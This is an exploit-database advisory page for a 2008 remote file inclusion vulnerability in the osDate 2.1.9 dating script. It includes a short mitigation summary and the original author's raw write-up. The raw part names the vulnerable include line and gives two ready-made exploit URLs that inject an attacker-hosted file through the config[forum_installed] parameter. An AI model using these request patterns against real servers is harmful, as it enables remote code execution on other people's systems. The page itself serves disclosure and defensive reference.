header-logo
Suggest Exploit
vendor:
osDate
by:
NoGe
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: osDate
Affected Version From: 2.1.9
Affected Version To: 2.1.9
Patch Exists: NO
Related CWE: N/A
CPE: tufat.com:osdate
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

osDate Remote File Inclusion Vulnerabilities

An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application. This request contains a malicious file that can be included and executed on the server. The malicious file can be hosted on the attacker's server or any other server that allows remote file inclusion.

Mitigation:

The best way to mitigate this vulnerability is to validate user input and filter out any malicious code. Additionally, the application should be configured to only allow the inclusion of files from a limited set of directories.
Source

Exploit-DB raw data:

========================================================================================
[o] osDate Remote File Inclusion Vulnerabilities
Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]
Vendor   : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com
Blog     : http://evilc0de.blogspot.com/
========================================================================================
[o] Vulnerable file
include_once($config['forum_installed'] . "_forum.php");
	forum/adminLogin.php
	forum/userLogin.php
[o] Exploit
       http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
       http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]
[o] Dork
       cari ndiri yee.. gampang koq dork na.. :p
========================================================================================
[o] Greetz
       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella
       H312Y yooogy mousekill }^-^{ noname s4va stardustmemory
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
========================================================================================

Navigation

Suggest Exploit

Services By CQR